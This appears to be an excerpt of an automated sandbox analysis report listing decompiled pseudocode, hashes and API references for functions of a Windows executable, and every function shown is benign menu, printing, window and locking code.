Opcode ID: 1fa4b06cf202911a48bd5778f93d7ea433d21bb91d68bb8759a04b6c6ce5915f
Instruction ID: ae4b4b36a82c0fb24a04fc960110fbe0e47da5ab5bc52ceb76e1162106b6cb18
Opcode Fuzzy Hash: 1fa4b06cf202911a48bd5778f93d7ea433d21bb91d68bb8759a04b6c6ce5915f
Instruction Fuzzy Hash: 7A11E992B043403BF311B675CCC2B6B26C88B88358F40153EFA46963D3D5BD9C50836E

Uniqueness

Uniqueness Score: -1.00%

Function 0045769C, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0045769C(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x4578f7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x4578fe);
					E004043D8( &_v68);
					return E004043D8( &_v12);
				}
				E00404470( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E00459658(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x4a0eb8 + ((E004047E4( *((intOrPtr*)(_t154 + 0x30)), 0x45791c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x004A0EAC |  *0x004A0E9C |  *0x004A0EA4 | 0x00000400;
							_t103 = E00459658(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404898(_v12));
							} else {
								_t109 = E00404898( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00457BAC(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00459C14(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00459230(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x4a0eec + ((E004047E4( *((intOrPtr*)(_t154 + 0x30)), 0x45791c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x004A0EE4 |  *0x004A0EC0 |  *0x004A0EF4 |  *0x004A0EFC;
							_v61.fState =  *0x004A0ECC |  *0x004A0EDC |  *0x004A0ED4;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404898(_v12);
							if(E00459658(_t154) > 0) {
								_v61.hSubMenu = E00457BAC(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x457910);
						E00456D00( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404758();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x456590; // 0x4565dc
					_t149 = E004037A4( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00457BAC(_t154);
				goto L8;
			}

0x0045769c
0x004576a7
0x004576aa
0x004576ad
0x004576b0
0x004576b2
0x004576b6
0x004576b7
0x004576bc
0x004576bf
0x004576c6
0x004578d9
0x004578db
0x004578de
0x004578e1
0x004578e9
0x004578f6
0x004578f6
0x004576d2
0x004576e0
0x004576ee
0x004576f3
0x00457738
0x00457746
0x00457892
0x0045789a
0x0045789f
0x004578a1
0x004578d4
0x004578a3
0x004578a6
0x004578bb
0x004578bb
0x00000000
0x004578a1
0x0045774c
0x00457753
0x00457761
0x00457765
0x0045777c
0x0045778a
0x0045778a
0x00000000
0x0045778a
0x00457786
0x00457788
0x00000000
0x00000000
0x00000000
0x0045778e
0x0045778e
0x0045778e
0x00457790
0x00457790
0x004577df
0x00457806
0x0045780d
0x00457812
0x00457817
0x0045781c
0x00457827
0x00457833
0x0045783c
0x0045783c
0x00457848
0x00000000
0x00457848
0x00457765
0x004576f5
0x004576f8
0x004576fa
0x00457714
0x00457714
0x00457717
0x00457723
0x00457728
0x00457733
0x00000000
0x00457733
0x004576fc
0x00457700
0x00000000
0x00000000
0x00457705
0x0045770b
0x00457710
0x00457712
0x00000000
0x00000000
0x00000000
0x00457712
0x004576e9
0x00000000

APIs

InsertMenuItemA.USER32 ref: 00457848
GetVersion.KERNEL32(00000000,004578F7), ref: 00457738

Part of subcall function 00457BAC: CreatePopupMenu.USER32 ref: 00457BC7

Strings

?, xrefs: 00457753
,, xrefs: 0045774C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?
API String ID: 133695497-2308483597
Opcode ID: 92faf50fca7a9a6ad3f51fbb0cb8afe85ac5a6b0d9334fa202d585fb2e8049fe
Instruction ID: b431dbae6964449d4e4fdd8df006465d8f76434cbf84d7d65b725533869c4e47
Opcode Fuzzy Hash: 92faf50fca7a9a6ad3f51fbb0cb8afe85ac5a6b0d9334fa202d585fb2e8049fe
Instruction Fuzzy Hash: 0761E370A082459BDB10EF79EC8169A7BE5AF4A305B4448BAFD40E7397D738EC09C758

Uniqueness

Uniqueness Score: -1.00%

Function 0046F680, Relevance: 10.7, APIs: 7, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0046F680(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _v60;
				void* _v76;
				signed int _t91;
				signed int _t117;
				signed int _t121;
				void* _t125;
				intOrPtr _t126;
				signed int _t127;
				long _t128;
				intOrPtr _t139;
				signed int _t143;
				void* _t146;
				void* _t149;
				void* _t151;
				void* _t153;
				void* _t156;
				void* _t157;
				intOrPtr _t158;
				void* _t159;

				_t159 = __eflags;
				_t156 = _t157;
				_t158 = _t157 + 0xffffffb8;
				_push(__edi);
				_t125 = __edx;
				_v8 = __eax;
				E00402FB0( &_v60, 0x30);
				_t149 = E00432528();
				_t3 = _t149 + 0x18; // 0x18
				E0040442C(_t3, _t125);
				E00431C90(_t149, 0, __edi, _t149, _t156, _t159);
				_t126 = E0043202C(_t149);
				_v60 = _t126;
				_v56 = _t126;
				_t127 = GetDeviceCaps(E0043202C(_t149), 0x58);
				_t143 = GetDeviceCaps(E0043202C(_t149), 0x5a);
				if(E0040693C(_v8 + 0x278) == 0) {
					asm("cdq");
					_v52 =  *(_v8 + 0x278) * 0x5a0 / _t127;
					asm("cdq");
					_v48 =  *(_v8 + 0x27c) * 0x5a0 / _t143;
					asm("cdq");
					_v44 =  *(_v8 + 0x280) * 0x5a0 / _t127;
					_t91 =  *(_v8 + 0x284) * 0x5a0;
					asm("cdq");
					__eflags = _t91 % _t143;
					_v40 = _t91 / _t143;
				} else {
					_t117 = E0043205C(_t149);
					asm("cdq");
					_v44 = _t117 * 0x5a0 / _t127;
					_t121 = E00432040(_t149);
					asm("cdq");
					_v40 = _t121 * 0x5a0 / _t143;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t151 = _t149;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t153 = _t151;
				_t128 = 0;
				_t146 = E00446CB8();
				_v16 = 0xffffffff;
				_v12 = SetMapMode(_v60, 1);
				SendMessageA(E0044D590(_v8), 0x439, 0, 0);
				_push(_t156);
				_push(0x46f847);
				_push( *[fs:eax]);
				 *[fs:eax] = _t158;
				while(1) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t146 = _t146;
					_t153 = _t153;
					_v20 = _t128;
					_t128 = SendMessageA(E0044D590(_v8), 0x439, 1,  &_v60);
					if(_t146 > _t128) {
						_t163 = _t128 - 0xffffffff;
						if(_t128 != 0xffffffff) {
							E00431D4C(_t153, _t163);
						}
					}
					if(_t146 <= _t128) {
						break;
					}
					_t165 = _t128 - 0xffffffff;
					if(_t128 != 0xffffffff) {
						continue;
					}
					break;
				}
				E00431D18(_t153, _t165);
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(0x46f84e);
				SendMessageA(E0044D590(_v8), 0x439, 0, 0);
				return SetMapMode(_v60, _v12);
			}

0x0046f680
0x0046f681
0x0046f683
0x0046f688
0x0046f689
0x0046f68b
0x0046f698
0x0046f6a2
0x0046f6a4
0x0046f6a9
0x0046f6b0
0x0046f6bc
0x0046f6be
0x0046f6c1
0x0046f6d3
0x0046f6e4
0x0046f6f5
0x0046f72c
0x0046f72f
0x0046f73f
0x0046f742
0x0046f752
0x0046f755
0x0046f75b
0x0046f765
0x0046f766
0x0046f768
0x0046f6f7
0x0046f6f9
0x0046f704
0x0046f707
0x0046f70c
0x0046f717
0x0046f71a
0x0046f71a
0x0046f772
0x0046f773
0x0046f774
0x0046f775
0x0046f776
0x0046f77e
0x0046f77f
0x0046f780
0x0046f781
0x0046f782
0x0046f783
0x0046f78d
0x0046f78f
0x0046f7a1
0x0046f7b6
0x0046f7bd
0x0046f7be
0x0046f7c3
0x0046f7c6
0x0046f7c9
0x0046f7d1
0x0046f7d2
0x0046f7d3
0x0046f7d4
0x0046f7d5
0x0046f7d6
0x0046f7d7
0x0046f7f3
0x0046f7f7
0x0046f7f9
0x0046f7fc
0x0046f800
0x0046f800
0x0046f7fc
0x0046f807
0x00000000
0x00000000
0x0046f809
0x0046f80c
0x00000000
0x00000000
0x00000000
0x0046f80c
0x0046f810
0x0046f817
0x0046f81a
0x0046f81d
0x0046f834
0x0046f846

APIs

Part of subcall function 00431C90: SetAbortProc.GDI32(?,Function_000316FC), ref: 00431CF9
Part of subcall function 00431C90: StartDocA.GDI32(?), ref: 00431D03
Part of subcall function 00431C90: StartFormPage.GDI32(?), ref: 00431D0C

GetDeviceCaps.GDI32(00000000,00000058), ref: 0046F6CE
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046F6DF
SetMapMode.GDI32(?,00000001), ref: 0046F79C
SendMessageA.USER32 ref: 0046F7B6
SendMessageA.USER32 ref: 0046F7EE

Part of subcall function 0043205C: GetDeviceCaps.GDI32(?,00000008), ref: 0043206E

Part of subcall function 00432040: GetDeviceCaps.GDI32(?,0000000A), ref: 00432052

SendMessageA.USER32 ref: 0046F834
SetMapMode.GDI32(?,?), ref: 0046F841

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$MessageSend$ModeStart$AbortFormPageProc
String ID:
API String ID: 456627103-0
Opcode ID: 85979db245c641b2fc265481dd64b6732e4ad3387eee28fb055c3411dfc9d46a
Instruction ID: fe1f0d282ea9a1a2c90c1003f83769caf3308cd02a95b7dec1d06c5787af96b8
Opcode Fuzzy Hash: 85979db245c641b2fc265481dd64b6732e4ad3387eee28fb055c3411dfc9d46a
Instruction Fuzzy Hash: 72519471A00604ABDB00EFAAD982A8EB7F5AF09314F51117AF500FB291D6B99E058B59

Uniqueness

Uniqueness Score: -1.00%

Function 0044EC08, Relevance: 10.7, APIs: 7, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0044EC08(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x4bb224; // 0x4bcb80
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x44ede1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E00446D74(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E00447FE0(_v8,  &_v28);
				if(E00464E94() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00464E94() -  *(_v8 + 0x4c);
				}
				if(E00464EA0() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00464EA0() -  *(_v8 + 0x48);
				}
				if(E00464E88() > _v28) {
					_v28 = E00464E88();
				}
				if(E00464E7C() > _v16) {
					_v16 = E00464E7C();
				}
				SetWindowPos(E0044D590(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404698(_t119) < 0x64 &&  *0x4a0ce4 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00451EF0( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4a0ce4(E0044D590(_v8), 0x64,  *0x004A0DEC | 0x00040000);
					}
				}
				_t80 =  *0x4bb048; // 0x4bcb7c
				E0044ACC4(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E0044D590(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x44ede8);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}

0x0044ec16
0x0044ec17
0x0044ec18
0x0044ec19
0x0044ec1a
0x0044ec1c
0x0044ec1f
0x0044ec28
0x0044ec31
0x0044ec32
0x0044ec37
0x0044ec3a
0x0044ec42
0x0044ec47
0x0044ec51
0x0044ec68
0x0044ec77
0x0044ec77
0x0044ec8c
0x0044ec9b
0x0044ec9b
0x0044eca8
0x0044ecb1
0x0044ecb1
0x0044ecbe
0x0044ecc7
0x0044ecc7
0x0044eced
0x0044ed05
0x0044ed2d
0x0044ed36
0x0044ed45
0x0044ed4e
0x0044ed5c
0x0044ed67
0x0044ed67
0x0044ed67
0x0044ed8b
0x0044ed8b
0x0044ed36
0x0044ed91
0x0044ed9e
0x0044edae
0x0044edb8
0x0044edbd
0x0044edc0
0x0044edc3
0x0044edd0
0x0044edd6
0x0044edd9
0x0044ede0

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0044ECED
GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,0044EDE1), ref: 0044ECF2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0044ED2D
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0044ED45
AnimateWindow.USER32(00000000,00000064,00000001), ref: 0044ED8B
ShowWindow.USER32(00000000,00000004), ref: 0044EDAE

Part of subcall function 00451EF0: GetCursorPos.USER32(?), ref: 00451EF4

GetTickCount.KERNEL32(0044EDE8), ref: 0044EDC8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 4735a88d0c22d5b685d3fe8a903af22ca9d0df60c738a3066c3deabe5e8d8478
Instruction ID: 9c59585f721ada9a74454e0e0b16337c24ed4c8c98d1746030951f3d54b78439
Opcode Fuzzy Hash: 4735a88d0c22d5b685d3fe8a903af22ca9d0df60c738a3066c3deabe5e8d8478
Instruction Fuzzy Hash: D8514B74A00205EFEB10EFA9C982A9EB7F5BF48304F2045A6F500E7395D779AE40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416F1E, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00416F1E(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v9;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char* _v48;
				char _v52;
				signed int _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				intOrPtr _t57;
				intOrPtr* _t61;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				signed int _t114;
				signed int _t115;
				char _t123;
				intOrPtr _t129;
				signed int _t138;
				intOrPtr _t145;
				void* _t147;
				void* _t148;
				intOrPtr _t149;
				void* _t160;

				_t144 = __esi;
				_t141 = __edi;
				_t123 = __edx;
				_t115 = __ecx;
				_t147 = _t148;
				_t149 = _t148 + 0xfffffec0;
				_push(__esi);
				_push(__edi);
				_v324 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t149 = _t149 + 0xfffffff0;
					_t57 = E00403984(_t57, _t147);
				}
				_v12 = _t115;
				_v9 = _t123;
				_v8 = _t57;
				_push(_t147);
				_push(0x41717d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E004035DC(0);
				_push(0x4bc828);
				L00406AC4();
				_t116 = 0;
				_push(_t147);
				_push(0x417150);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t149;
				_t114 = (_v12 & 0x0000ffff) - 0x100;
				if(_t114 < 0 || _v12 < 0x10f) {
					_t61 =  *0x4bb1b0; // 0x4a012c
					_v28 =  *_t61;
					_v24 = 0xb;
					_v20 = _v12 & 0x0000ffff;
					_v16 = 0;
					_t65 =  *0x4bae98; // 0x40795c
					E0040656C(_t65, _t116,  &_v32);
					_t116 = _v32;
					E0040CB00(_t114, _v32, 1, _t141, _t144, 1,  &_v28);
					E00403DEC();
				}
				_t69 =  *0x4bc824; // 0x1c41ebc
				_t145 = E0040564C(_t69);
				if(_t145 <= _t114) {
					asm("cdq");
					_t141 = (_t114 / 0xf + 1 << 4) - _t114 / 0xf + 1;
					if(_t141 > 0x7ff) {
						_t107 =  *0x4badc8; // 0x407974
						E0040656C(_t107, 0xf,  &_v36);
						E0040CAC4(_v36, 1);
						E00403DEC();
					}
					_push(_t141);
					_t116 = 1;
					E00405828();
					_t102 =  *0x4bc824; // 0x1c41ebc
					_t103 = E0040564C(_t102);
					_t138 = _t145;
					_t105 = _t103 - 1 - _t138;
					if(_t105 >= 0) {
						_t106 = _t105 + 1;
						do {
							_t116 =  *0x4bc824; // 0x1c41ebc
							_t145 = 0;
							 *((intOrPtr*)(_t116 + _t138 * 4)) = 0;
							_t138 = _t138 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
					}
				}
				_t71 =  *0x4bc824; // 0x1c41ebc
				_t72 =  *((intOrPtr*)(_t71 + _t114 * 4));
				if(_t72 != 0) {
					_t160 = _t72 -  *0x4a0474; // 0xffffffff
					if(_t160 != 0) {
						_t76 =  *0x4bb1b0; // 0x4a012c
						_v64 =  *_t76;
						_v60 = 0xb;
						_v56 = _v12 & 0x0000ffff;
						_v52 = 0;
						_t79 =  *0x4bc824; // 0x1c41ebc
						E0040355C( *((intOrPtr*)( *((intOrPtr*)(_t79 + _t114 * 4)))),  &_v320);
						_v48 =  &_v320;
						_v44 = 4;
						_t85 =  *0x4bad10; // 0x407964
						E0040656C(_t85, _t116,  &_v324);
						E0040CB00(_t114, _v324, 1, _t141, _t145, 2,  &_v64);
						E00403DEC();
					} else {
						_t89 =  *0x4bb1b0; // 0x4a012c
						_v28 =  *_t89;
						_v24 = 0xb;
						_v20 = _v12 & 0x0000ffff;
						_v16 = 0;
						_t93 =  *0x4baf38; // 0x40796c
						E0040656C(_t93, _t116,  &_v40);
						E0040CB00(_t114, _v40, 1, _t141, _t145, 1,  &_v28);
						E00403DEC();
					}
				}
				_t73 =  *0x4bc824; // 0x1c41ebc
				 *((intOrPtr*)(_t73 + _t114 * 4)) = _v8;
				 *((short*)(_v8 + 4)) = _v12;
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(E00417157);
				_push(0x4bc828);
				L00406C2C();
				return 0;
			}

0x00416f1e
0x00416f1e
0x00416f1e
0x00416f1e
0x00416f21
0x00416f23
0x00416f2a
0x00416f2b
0x00416f2e
0x00416f34
0x00416f37
0x00416f3a
0x00416f3f
0x00416f41
0x00416f44
0x00416f44
0x00416f49
0x00416f4d
0x00416f50
0x00416f55
0x00416f56
0x00416f5b
0x00416f5e
0x00416f66
0x00416f6b
0x00416f70
0x00416f75
0x00416f77
0x00416f78
0x00416f7d
0x00416f80
0x00416f87
0x00416f8f
0x00416f99
0x00416fa0
0x00416fa3
0x00416fab
0x00416fae
0x00416fbb
0x00416fc0
0x00416fc5
0x00416fcf
0x00416fd4
0x00416fd4
0x00416fd9
0x00416fe3
0x00416fe7
0x00416ff0
0x00416ff9
0x00417001
0x00417006
0x0041700b
0x0041701a
0x0041701f
0x0041701f
0x00417024
0x0041702a
0x00417035
0x00417040
0x00417045
0x0041704b
0x0041704c
0x0041704e
0x00417050
0x00417051
0x00417051
0x00417057
0x00417059
0x0041705c
0x0041705d
0x0041705d
0x00417051
0x0041704e
0x00417060
0x00417065
0x0041706a
0x00417070
0x00417076
0x004170ba
0x004170c1
0x004170c4
0x004170cc
0x004170cf
0x004170d3
0x004170e3
0x004170ee
0x004170f1
0x00417101
0x00417106
0x00417118
0x0041711d
0x00417078
0x00417078
0x0041707f
0x00417082
0x0041708a
0x0041708d
0x0041709a
0x0041709f
0x004170ae
0x004170b3
0x004170b3
0x00417076
0x00417122
0x0041712a
0x00417134
0x0041713a
0x0041713d
0x00417140
0x00417145
0x0041714a
0x0041714f

APIs

RtlEnterCriticalSection.KERNEL32(004BC828,00000000,0041717D), ref: 00416F70

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

RtlLeaveCriticalSection.KERNEL32(004BC828,00417157,00417150,?,004BC828,00000000,0041717D), ref: 0041714A

Strings

ty@, xrefs: 00417006
\y@, xrefs: 00416FBB
ly@, xrefs: 0041709A
DmA, xrefs: 0041702F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveLoadString
String ID: DmA$\y@$ly@$ty@
API String ID: 2800025304-3225984291
Opcode ID: d40ac1c25d385f74094847df4d9a4eb01589728738778be10d13e0c5dd6cbc62
Instruction ID: 1abd86978a0b7f04c0c680a586c9a56a91982e78ded87e2e5c0fffbbfe0de29a
Opcode Fuzzy Hash: d40ac1c25d385f74094847df4d9a4eb01589728738778be10d13e0c5dd6cbc62
Instruction Fuzzy Hash: E3519370A042049FCB00EFA9D8C1AEEBBF5EB49704F11417AE944E7391D77A9D40CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044467C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0044467C(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t114 = E00444ACC(_a4 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x4bb048; // 0x4bcb7c
				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E0044D590(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t107 =  *0x442c24; // 0x442c70
						__eflags = E004037A4( *_t19, _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E0044D590( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E00444610,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403814(_t102, _t127);
						_t79 =  *0x4bcafc; // 0x0
						_t111 =  *0x441810; // 0x44185c
						if(E004037A4(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x4bcafc; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x4bcafc; // 0x0
						if(E0044D590( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E0044D590(_t117);
					goto L19;
				}
				_t118 = E00443B88(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
